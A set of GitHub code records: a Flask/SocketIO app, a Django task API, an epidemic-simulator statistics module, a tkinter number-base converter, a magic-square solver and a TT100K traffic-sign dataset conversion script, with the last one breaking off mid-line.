projectJson = {\n \"name\": project.name,\n \"end_point\": project.end_point\n }\n projectsJson.append(projectJson)\n res = make_response(jsonify(projectsJson), 200)\n return res\n\n\n# Table for storing users\nclass User(UserMixin, db.Model):\n __tablename__ = 'Users'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n email = db.Column(\"Email\", db.String(50), unique=True)\n #location = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n username = db.Column(\"Username\", db.String(50), unique=True)\n password = db.Column(\"Password\", db.String(50))\n projects = db.relationship(\"Project\", secondary=\"UsersProjects\")\n\n \n\n\n\n# Table for storing projects\nclass Project(db.Model):\n __tablename__ = 'Projects'\n id = db.Column(\"ID\", db.Integer, primary_key = True)\n name = db.Column(\"Name\", db.String(50))\n end_point = db.Column(\"EndPoint\", db.String(50))\n #value = db.Column(db.String(50))\n #date_created = db.Column(db.DateTime, dafault = datetime.now)\n\n\n# Table for storing users-projects\nclass UserProject(db.Model):\n __tablename__ = 'UsersProjects'\n id = db.Column(\"ID\", db.Integer, primary_key=True)\n user_id = db.Column(\"UserID\", db.Integer, db.ForeignKey('Users.ID'))\n project_id = db.Column(\"ProjectID\", db.Integer, db.ForeignKey('Projects.ID'))\n user = db.relationship(User, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n project = db.relationship(Project, backref=db.backref(\"UsersProjects\", cascade=\"all, delete-orphan\"))\n\n\n\n\n\n\n#Events\n@socketio.on('message')\ndef handle_message(msg):\n print('get message:'+ msg)\n send(msg, broadcast=True)\n\n\n@socketio.on('create_data')\ndef handle_create_data(json):\n print('received json: ' + str(json))\n emit('create_data', json, broadcast=True)\n\n@socketio.on('create_model')\ndef handle_create_model(json):\n print('received json: ' + str(json))\n emit('create_model', json, broadcast=True)\n\n\n@socketio.on('create_workflow')\ndef handle_create_workflow(json):\n print('received json: 
' + str(json))\n emit('create_workflow', json, broadcast=True)\n\n\n\nif __name__ == '__main__':\n socketio.run(app, debug=True, port=3001)","repo_name":"Atif-Aerospace/AirCADiaNebosDatabase","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"395190592","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Task\nfrom .serializers import TaskSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_list(request):\n tasks = Task.objects.filter(owner=request.user)\n serializer = TaskSerializer(tasks, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_task_detail(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task)\n return Response(serializer.data)\n\n@api_view(['POST'])\n# @permission_classes([IsAuthenticated])\ndef create_task(request):\n serializer = TaskSerializer(data=request.data)\n if serializer.is_valid():\n serializer.validated_data['owner'] = request.user\n serializer.validated_data['completed'] = False\n serializer.save()\n return Response(serializer.data, status=201)\n return Response(serializer.errors, status=400)\n\n@api_view(['PATCH'])\n@permission_classes([IsAuthenticated])\ndef edit_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n serializer = TaskSerializer(task, data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=400)\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.delete()\n return Response(status=204)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef execute_task(request, id):\n task = get_object_or_404(Task, id=id, owner=request.user)\n task.completed = True\n task.save()\n return Response({\"message\": \"Task marked as completed\"})\n","repo_name":"adaltair/decodeproject","sub_path":"src/todo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13670577312","text":"\"\"\"\n03/08/2020\n\nGroup 4: Majed Almazrouei, Justin Becker, Dylan Conway, Kyle Diodati, Nicholas Fay\n\nThis module is in charge of collecting and producing statistics on the simulation and the data it collected from\nthe contagions influence on the population.\n\"\"\"\n\nimport os\nimport sys\n\nimport lib.city\nimport lib.person\nimport lib.vessel\n\n\nclass statistics:\n\n def __init__(self):\n \"\"\"\n self, None -> None\n This function has the purpose of initializing the statistics module. \n This module keeps track of all statistical calculations/displays that the program makes.\n \"\"\"\n self.cities = list() #list of all the cities in the simulation\n self.activevessels = list() # list of flights that are ready to leave\n self.inactivevessels = list() # list of flights not ready to leave\n #number of dead, immune, infected and healthy individuals\n self.dead = 0\n self.immune = 0\n self.inf = 0\n self.healthy = 0\n\n self.Re = 100\n self.totalPop = 0\n\n def add_vessels(self, newVessels):\n \"\"\"\n self, list(new vessels) -> None\n This function adds new vessels to the active planes we can track.\n \"\"\"\n self.activevessels += newVessels\n return\n\n def add_city(self, newcity):\n \"\"\"\n self, city (city object) -> None\n This function adds cities to the statistics cities list.\n \"\"\"\n self.cities.append(newcity)\n # Add to the total population.\n self.totalPop += len(newcity.people)\n return \n\n def curr_contagion_info(self, hour, run_time):\n \"\"\"\n self, int (hour), int (run time) -> None\n This function has a purpose of printing the current information of the contagions impact \n on the population for that specific day: hour. This function is solely used for printing to console\n to visually show the trends in the contagion contamination.\n \"\"\"\n\n #print header day and hour values\n formated_completon_perc = str((hour/run_time) * 100)\n formated_completon_perc = formated_completon_perc[:5]\n print(\"\\033[0;0H\", end=\"\")\n print(\"\\rSimulation Completion at {}%\\n\".format(formated_completon_perc), end=\"\\n\")\n print(\"\\r\\33[1mDay {}\\tHour {}:\".format(int(hour/24), hour), end=\"\\n\")\n #iterate through all the cities and get the total counts for contagion information\n for location in self.cities:\n inf = location.inf_count\n hlth = location.healthy_count\n immu = location.immune_count\n dead = location.dead_count\n #print the information to the console\n print(\"\\r \\033[K\", end=\"\") # Fixes healthy having character duplicates\n print(\"\\r \\33[1m {}\\33[0m:\\t\\t\\33[32m{} Healthy\\33[0m\\t {} Immune\\t\\33[93m{} Infected \\33[0m\\t\\33[31m {} Dead \\33[0m\".format(location.name, hlth, immu, inf, dead), end=\"\\n\")\n \n print(\"\\r\\nEffective Reproduction Number: {}\".format(self.Re), end=\"\\n\")\n\n print(\"\\r\\nPress CTRL^C to exit the simulation early.\")\n return \n \n def get_total_counts(self):\n \"\"\"\n self, None -> None\n This function is responsible for getting the total amount of the given attribute (inf, dead etc) people \n from each city to report statistics.\n \"\"\"\n for city in self.cities: #iterate through all the cities\n self.healthy += city.healthy_count\n self.dead += city.dead_count\n self.immune += city.immune_count\n self.inf += city.inf_count\n \n # Get counts for people still in flight when the program finishes.\n for flight in self.activevessels:\n for person in flight.people:\n if person.immune:\n self.immune += 1\n elif person.dead:\n self.dead += 1\n elif person.infected:\n 
self.inf += 1\n else:\n self.healthy += 1\n return\n\n def get_percentage(self, count, init_population):\n \"\"\"\n self, int (count of people), int (healthy person count) -> float\n This function is in charge of calculating the percentage of individuals that \n die, get infected or become immune compared to the overall population.\n \"\"\"\n #try to calculate percentage\n try:\n return ((count/init_population) * 100)\n except ZeroDivisionError:\n #if there is a division by zero error for some reason\n return 0\n\n def print_time_series_table(self, days, immune, infected, dead):\n \"\"\"\n self, list, list, list, list -> None\n This function is in charge of printing a table that shows all the time series data\n that has been collected. This will be exececuted at the end of the program.\n \"\"\"\n #dict for labels and rows\n table = [days, infected, immune, dead]\n #list of all header labels\n headers = [\"Days\", \"Infected\", \"Immune\", \"Dead\"]\n for item in headers:\n print(\"\\33[1m{:>10}\\33[0m\".format(item).strip(\"\\n\"), end=\"\")\n print(\"\")\n #iterate through table keys\n i = 0\n while(i10}\".format(row[i]).strip(\"\\n\"), end=\"\")\n #print a new line for the next day\n print(\"\")\n i += 1\n return\n\n def average_stats(self, days, attribute):\n \"\"\"\n self, int (days), int (attribute) -> float\n This function has a purpose of determining the average number of\n individuals that die, immune or are infected each day. \n \"\"\"\n return attribute/days\n\n def print_stats(self, days, initial_pop):\n \"\"\"\n self, int (days the simulation ran for), int (initial population) -> None\n This function has the sole function of printing all final statistics after\n the execution of the main program.\n \"\"\"\n #get the total counts of infected, dead, immune and healthy individuals\n self.get_total_counts()\n #get the percentage of those dead, immune and infected\n dead_perc = self.get_percentage(self.dead, initial_pop)\n immune_perc = self.get_percentage(self.immune, initial_pop)\n inf_perc = self.get_percentage(self.inf, initial_pop)\n healthy_perc = self.get_percentage(self.healthy, initial_pop)\n average_deaths = self.average_stats(days,self.dead)\n average_infected = self.average_stats(days, self.inf)\n average_immune = self.average_stats(days, self.immune)\n #print the total counts after the amount of time the simulation has run\n print(\"\\n\\nAfter {} days, these are the results of the contagions impact on the population with {} individuals.\".format(days, initial_pop))\n print(\"\\33[1mTotal Counts ---->\\33[0m\\33[32m Healthy: {},\\33[0m\\33[93m Infected: {},\\33[0m \\33[31mDead: {},\\33[0m Immune: {}\".format(self.healthy, self.inf, self.dead, self.immune))\n print(\"Each day on average: \\33[93m{} people are infected\\33[0m, \\33[31m{} die\\33[0m and {} become immune.\".format(average_infected, average_deaths, average_immune))\n #print the total amount of healthy people, dead, infected and immune\n print(\"Out of the {} people in the total population.\".format(initial_pop))\n print(\"{}% are \\33[31mdead.\\33[0m\".format(dead_perc))\n print(\"{}% are immune.\".format(immune_perc))\n print(\"{}% were \\33[93minfected.\\33[0m\".format(inf_perc))\n print(\"{}% are still \\33[32mhealthy.\\33[0m\".format(healthy_perc))\n return\n","repo_name":"kdiodati/Epidemic-Simulator","sub_path":"lib/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27048950868","text":"\n# Write Python GUI program to accept a decimal number and convert and display it to binary, octal and hexadecimal number.\nfrom tkinter import *\ndef calculate():\n res=int(e1.get())\n label_text.set(bin(res))\n label_text1.set(oct(res))\n label_text2.set(hex(res))\n \nwindow=Tk()\nlabel_text=StringVar()\nlabel_text1=StringVar()\nlabel_text2=StringVar()\nLabel(window,text=\"Enter Decimal Number: \").grid(row=0)\n\n\nLabel(window,text=\"Binary: \").grid(row=3)\nresult=Label(window,text=\"\",textvariable=label_text).grid(row=3,column=1)\n\nLabel(window,text=\"Octal\").grid(row=4)\nresult=Label(window,text=\"\",textvariable=label_text1).grid(row=4,column=1)\n\nLabel(window,text=\"Hexadecimal: \").grid(row=5)\nresult=Label(window,text=\"\",textvariable=label_text2).grid(row=5,column=1)\ne1=Entry(window)\ne1.grid(row=0,column=1)\nb=Button(window,text=\"Calculate\",command=calculate)\nb.grid(row=0,column=6,columnspan=2,rowspan=2,padx=5,pady=5)\nmainloop()\n\n","repo_name":"khankabi/TY-BCA_Samir","sub_path":"PRACTICAL SLIPS SOLUTION/Slip 27/python/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10448113425","text":"from itertools import combinations\nfrom random import shuffle\n\nfrom simpleai.search import SearchProblem, hill_climbing\n\nfrom utils import print_grid\n\n\nSQUARE_SIZE = 10\nMAX_NUMBER = SQUARE_SIZE ** 2\n\nTARGET_TOTAL = sum(range(1, MAX_NUMBER+1)) / SQUARE_SIZE\n\n\ndef find(element, state):\n for row_i, row in enumerate(state):\n for column_i, this_element in enumerate(row):\n if element == this_element:\n return row_i, column_i\n\n\nclass MagicSquareProblem(SearchProblem):\n def actions(self, state):\n return list(combinations(range(1, MAX_NUMBER +1), 2))\n\n def result(self, state, action):\n state = [list(row) for row in state]\n number_a, number_b = action\n\n a_row, a_column = find(number_a, state)\n b_row, b_column = find(number_b, state)\n\n state[a_row][a_column] = number_b\n state[b_row][b_column] = number_a\n\n return tuple(tuple(row) for row in state)\n\n def value(self, state):\n totals = []\n for row in state:\n totals.append(sum(row))\n\n for column in zip(*state):\n totals.append(sum(column))\n\n return totals.count(TARGET_TOTAL)\n\n def generate_random_state(self):\n numbers = list(range(1, MAX_NUMBER + 1))\n shuffle(numbers)\n\n state = []\n for row_index in range(SQUARE_SIZE):\n from_index = row_index * SQUARE_SIZE\n to_index = from_index + SQUARE_SIZE\n state.append(tuple(numbers[from_index:to_index]))\n\n return tuple(state)\n\n def print_state(self, state):\n elements = {\n str(element): [(row_i, column_i)]\n for row_i, row in enumerate(state)\n for column_i, element in enumerate(row)\n }\n\n print_grid(SQUARE_SIZE, SQUARE_SIZE, elements)\n\n\nif __name__ == \"__main__\":\n expected_value = SQUARE_SIZE * 2\n iterations = 0\n while True:\n iterations += 1\n random_state = MagicSquareProblem().generate_random_state()\n problem = MagicSquareProblem(random_state)\n result = hill_climbing(problem, 1000)\n if result.value == expected_value:\n print(\"solution found! Iterations:\", iterations)\n break\n if iterations % 10 == 0:\n print(f\"{iterations} iterations and the solution hasn't been found yet :(\")\n\n\n problem.print_state(result.state)\n print(\"value:\", problem.value(result.state))\n","repo_name":"sofide/ai-practices","sub_path":"magic_squares.py","file_name":"magic_squares.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12089360442","text":"import os\nimport json\nfrom random import random\nimport cv2\nimport shutil\nimport json\nimport xml.dom.minidom\nfrom tqdm import tqdm\nimport argparse\n\n\n# from jinxSkills.jinx_opencv.datasets_transform.dataset_transform import DataSets_transform\n\n\nclass TT100K2COCO:\n def __init__(self):\n self.original_datasets = 'tt100k'\n self.to_datasets = 'coco'\n\n def class_statistics(self):\n # os.makedirs('annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations_all.json')) as origin_json:\n origin_dict = json.load(origin_json)\n classes = origin_dict['types']\n # 建立统计每个类别包含的图片的字典\n sta = {}\n for i in classes:\n sta[i] = []\n\n images_dic = origin_dict['imgs']\n\n # 记录所有保留的图片\n saved_images = []\n # 遍历TT100K的imgs\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n obj_list = image_element['objects']\n\n # 遍历每张图片的标注信息\n for anno_dic in obj_list:\n label_key = anno_dic['category']\n # 防止一个图片多次加入一个标签类别\n if image_path not in sta[label_key]:\n sta[label_key].append(image_path)\n\n # 只保留包含图片数超过100的类别(重新划分,阈值100可根据需求修改)\n result = {k: v for k, v in sta.items() if len(v) >= 100}\n\n for i in result:\n print(\"the type of {} includes {} images\".format(i, len(result[i])))\n saved_images.extend(result[i])\n\n saved_images = list(set(saved_images))\n print(\"total types is {}\".format(len(result)))\n\n type_list = list(result.keys())\n result = {\"type\": type_list, \"details\": result, \"images\": saved_images}\n print(type_list)\n # 保存结果\n json_name = os.path.join(parent_path, 'statistics.json')\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets(self):\n # os.makedirs('dataset/annotations', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021/data'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n\n images_dic = 
origin_dict['imgs']\n\n obj_id = 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n image_element = images_dic[image_id]\n image_path = image_element['path']\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n H, W, _ = im.shape\n\n # 切换dataset的引用对象,从而划分数据集\n if 'train' in image_path:\n dataset = train_dataset\n elif 'test' in image_path:\n dataset = val_dataset\n else:\n dataset = test_dataset\n\n # 添加图像的信息到dataset中\n image_path = image_path.split('/')[-1]\n dataset['images'].append({'file_name': image_path,\n 'id': image_id,\n 'width': W,\n 'height': H})\n obj_list = image_element['objects']\n\n for anno_dic in obj_list:\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def original_datasets2object_datasets_re(self):\n '''\n 重新划分数据集\n :return:\n '''\n # os.makedirs('annotations2', exist_ok=True)\n # 存放数据的父路径\n parent_path = 'E:/dataset/tt100k_2021'\n\n # 读TT100K原始数据集标注文件\n with open(os.path.join(parent_path, 'annotations.json')) as origin_json:\n origin_dict = json.load(origin_json)\n\n with open(os.path.join(parent_path, 'statistics.json')) as select_json:\n select_dict = json.load(select_json)\n classes = select_dict['type']\n\n train_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n val_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n test_dataset = {'info': {}, 'licenses': [], 'categories': [], 'images': [], 'annotations': []}\n label = {} # 记录每个标志类别的id\n count = {} # 记录每个类别的图片数\n owntype_sum = {}\n\n info = {\n \"year\": 2021, # 年份\n \"version\": '1.0', # 版本\n \"description\": \"TT100k_to_coco\", # 数据集描述\n \"contributor\": \"Tecent&Tsinghua\", # 提供者\n \"url\": 'https://cg.cs.tsinghua.edu.cn/traffic-sign/', # 下载地址\n \"date_created\": 2021 - 1 - 15\n }\n licenses = {\n \"id\": 1,\n \"name\": \"null\",\n \"url\": \"null\",\n }\n\n train_dataset['info'] = info\n val_dataset['info'] = info\n test_dataset['info'] = info\n train_dataset['licenses'] = licenses\n val_dataset['licenses'] = licenses\n test_dataset['licenses'] = licenses\n\n # 建立类别和id的关系\n for i, cls in enumerate(classes):\n train_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n val_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n test_dataset['categories'].append({'id': i, 'name': cls, 'supercategory': 'traffic_sign'})\n label[cls] = i\n count[cls] = 0\n owntype_sum[cls] = 0\n\n images_dic = origin_dict['imgs']\n\n obj_id = 1\n\n # 计算出每个类别共‘包含’的图片数\n for image_id in images_dic:\n\n image_element = 
images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n owntype_sum[own_type] += 1\n\n # TT100K的annotation转换成coco的\n for image_id in images_dic:\n\n image_element = images_dic[image_id]\n image_path = image_element['path']\n image_name = image_path.split('/')[-1]\n # 在所选的类别图片中\n if image_name not in select_dict['images']:\n continue\n print(\"dealing with {} image\".format(image_path))\n # shutil.copy(os.path.join(parent_path,image_path),os.path.join(parent_path,\"dataset/JPEGImages\"))\n\n # 处理TT100K中的标注信息\n obj_list = image_element['objects']\n # 记录图片中包含最多的实例所属的type\n includes_type = {}\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n # print(anno_dic[\"category\"])\n if anno_dic[\"category\"] in includes_type:\n includes_type[anno_dic[\"category\"]] += 1\n else:\n includes_type[anno_dic[\"category\"]] = 1\n # print(includes_type)\n own_type = max(includes_type, key=includes_type.get)\n count[own_type] += 1\n num_rate = count[own_type] / owntype_sum[own_type]\n\n # 切换dataset的引用对象,从而划分数据集根据每个类别类别的总数量按7:2:1分为了train_set,val_set,test_set。\n # 其中每个图片所属类别根据该图片包含的类别的数量决定(归属为含有类别最多的类别)\n if num_rate < 0.7:\n dataset = train_dataset\n elif num_rate < 0.9:\n dataset = val_dataset\n else:\n print(\"dataset=test_dataset\")\n dataset = test_dataset\n\n for anno_dic in obj_list:\n if anno_dic[\"category\"] not in select_dict[\"type\"]:\n continue\n x = anno_dic['bbox']['xmin']\n y = anno_dic['bbox']['ymin']\n width = anno_dic['bbox']['xmax'] - anno_dic['bbox']['xmin']\n height = anno_dic['bbox']['ymax'] - anno_dic['bbox']['ymin']\n label_key = anno_dic['category']\n\n dataset['annotations'].append({\n 'area': width * height,\n 'bbox': [x, y, width, height],\n 'category_id': label[label_key],\n 'id': obj_id,\n 'image_id': image_id,\n 'iscrowd': 0,\n # mask, 矩形是从左上角点按顺时针的四个顶点\n 'segmentation': [[x, y, x + width, y, x + width, y + height, x, y + height]]\n })\n # 每个标注的对象id唯一\n obj_id += 1\n\n # 用opencv读取图片,得到图像的宽和高\n im = cv2.imread(os.path.join(parent_path, image_path))\n # print(image_path)\n H, W, _ = im.shape\n # 添加图像的信息到dataset中\n dataset['images'].append({'file_name': image_name,\n 'id': image_id,\n 'width': W,\n 'height': H})\n\n # 保存结果\n for phase in ['train', 'val', 'test']:\n json_name = os.path.join(parent_path, 'data/dataset/annotations/{}.json'.format(phase))\n with open(json_name, 'w', encoding=\"utf-8\") as f:\n if phase == 'train':\n json.dump(train_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'val':\n json.dump(val_dataset, f, ensure_ascii=False, indent=1)\n if phase == 'test':\n json.dump(test_dataset, f, ensure_ascii=False, indent=1)\n\n def json2xml(self):\n img_path = 'E:/dataset/tt100k_2021/data/train/' # train图片路径\n annos = json.loads(open(\"E:/dataset/tt100k_2021/data/annotations.json\").read())\n xml_path = 'E:/dataset/tt100k_2021data/xml_train/' # xml保存路径\n\n for line in open(img_path + \"ids.txt\"):\n img_name = line.replace('\\n', '')\n img_file = 
img_name + '.jpg'\n img = cv2.imread(img_path + img_file)\n sp = img.shape\n img_height = str(sp[0]) # height(rows) of image\n img_width = str(sp[1])\n\n doc = xml.dom.minidom.Document()\n # creat a root node which name is annotation\n annotation = doc.createElement('annotation')\n # add the root node to the dom document object\n doc.appendChild(annotation)\n\n # add the folder subnode\n folder = doc.createElement('folder')\n folder_text = doc.createTextNode('JPEGImages')\n folder.appendChild(folder_text)\n annotation.appendChild(folder)\n\n # add the filename subnode\n filename = doc.createElement('filename')\n filename_text = doc.createTextNode(img_file)\n filename.appendChild(filename_text)\n annotation.appendChild(filename)\n\n # add the path subnode\n path = doc.createElement('path')\n path_text = doc.createTextNode(\n img_path + img_file)\n path.appendChild(path_text)\n annotation.appendChild(path)\n\n # add the source subnode\n source = doc.createElement('source')\n database = doc.createElement('database')\n database_text = doc.createTextNode('Unknown')\n source.appendChild(database)\n database.appendChild(database_text)\n annotation.appendChild(source)\n\n # add the size subnode\n size = doc.createElement('size')\n width = doc.createElement('width')\n width_text = doc.createTextNode(img_width)\n height = doc.createElement('height')\n height_text = doc.createTextNode(img_height)\n depth = doc.createElement('depth')\n depth_text = doc.createTextNode('3')\n size.appendChild(width)\n width.appendChild(width_text)\n size.appendChild(height)\n height.appendChild(height_text)\n size.appendChild(depth)\n depth.appendChild(depth_text)\n annotation.appendChild(size)\n\n segmented = doc.createElement('segmented')\n segmented_text = doc.createTextNode('0')\n segmented.appendChild(segmented_text)\n annotation.appendChild(segmented)\n\n img_objects = annos[\"imgs\"][img_name]['objects']\n for i in range(0, len(img_objects)):\n obj_category = annos[\"imgs\"][img_name]['objects'][i]['category']\n obj_bbox = annos[\"imgs\"][img_name]['objects'][i]['bbox']\n bbox_ymin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymin'])\n bbox_xmin = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmin'])\n bbox_ymax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['ymax'])\n bbox_xmax = int(annos[\"imgs\"][img_name]['objects'][i]['bbox']['xmax'])\n print(obj_category, bbox_ymin, bbox_xmin, bbox_ymax, bbox_xmax)\n\n object = doc.createElement('object')\n name = doc.createElement('name')\n name_text = doc.createTextNode(obj_category)\n difficult = doc.createElement('difficult')\n difficult_text = doc.createTextNode('0')\n pose = doc.createElement('pose')\n pose_text = doc.createTextNode('Unspecified')\n truncated = doc.createElement('truncated')\n truncated_text = doc.createTextNode('0')\n bndbox = doc.createElement('bndbox')\n xmin = doc.createElement('xmin')\n xmin_text = doc.createTextNode(str(bbox_xmin))\n ymin = doc.createElement('ymin')\n ymin_text = doc.createTextNode(str(bbox_ymin))\n xmax = doc.createElement('xmax')\n xmax_text = doc.createTextNode(str(bbox_xmax))\n ymax = doc.createElement('ymax')\n ymax_text = doc.createTextNode(str(bbox_ymax))\n object.appendChild(name)\n name.appendChild(name_text)\n object.appendChild(pose)\n pose.appendChild(pose_text)\n object.appendChild(truncated)\n truncated.appendChild(truncated_text)\n object.appendChild(difficult)\n difficult.appendChild(difficult_text)\n object.appendChild(bndbox)\n bndbox.appendChild(xmin)\n xmin.appendChild(xmin_text)\n 
bndbox.appendChild(ymin)\n ymin.appendChild(ymin_text)\n bndbox.appendChild(xmax)\n xmax.appendChild(xmax_text)\n bndbox.appendChild(ymax)\n ymax.appendChild(ymax_text)\n annotation.appendChild(object)\n fp = open(xml_path + '%s.xml' % img_name, 'w+')\n doc.writexml(fp, indent='\\t', addindent='\\t', newl='\\n', encoding='utf-8')\n # print(annos[\"imgs\"][img_name]['objects'])\n fp.close()\n\n def coco_json2yolo_txt(self, class_json):\n # COCO 格式的数据集转化为 YOLO 格式的数据集\n # --json_path 输入的json文件路径\n # --save_path 保存的文件夹名字,默认为当前目录下的labels。\n\n\n parser = argparse.ArgumentParser()\n # 这里根��自己的json文件位置,换成自己的就行\n parser.add_argument('--json_path',\n default='E:/dataset/tt100k_2021/data/dataset/annotations/train.json',\n type=str, help=\"input: coco format(json)\")\n # 这里设置.txt文件保存位置\n parser.add_argument('--save_path', default='E:/dataset/tt100k_2021/data/dataset/annotations/', type=str,\n help=\"specify where to save the output dir of labels\")\n arg = parser.parse_args()\n\n\n def convert(size, box):\n dw = 1. / (size[0])\n dh = 1. / (size[1])\n x = box[0] + box[2] / 2.0\n y = box[1] + box[3] / 2.0\n w = box[2]\n h = box[3]\n # round函数确定(xmin, ymin, xmax, ymax)的小数位数\n x = round(x * dw, 6)\n w = round(w * dw, 6)\n y = round(y * dh, 6)\n h = round(h * dh, 6)\n return (x, y, w, h)\n\n # class_json = 'train'\n json_file = os.path.join(\n 'E:/dataset/tt100k_2021/data/dataset/annotations/%s.json' % class_json) # COCO Object Instance 类型的标注\n # ana_txt_save_path = 'D:/jinxData/TT100K/data/dataset/annotations/train' # 保存的路径\n ana_txt_save_path = os.path.join('E:/dataset/tt100k_2021/data/dataset/annotations', class_json) # 保存的路径\n\n data = json.load(open(json_file, 'r'))\n if not os.path.exists(ana_txt_save_path):\n os.makedirs(ana_txt_save_path)\n\n id_map = {} # coco数据集的id不连续!重新映射一下再输出!\n with open(os.path.join(ana_txt_save_path, 'classes.txt'), 'w') as f:\n # 写入classes.txt\n for i, category in enumerate(data['categories']):\n f.write(f\"{category['name']}\\n\")\n id_map[category['id']] = i\n # print(id_map)\n # 这里需要根据自己的需要,更改写入图像相对路径的文件位置。\n list_file = open(os.path.join(ana_txt_save_path, '%s.txt' % class_json.format()), 'w')\n for img in tqdm(data['images']):\n filename = 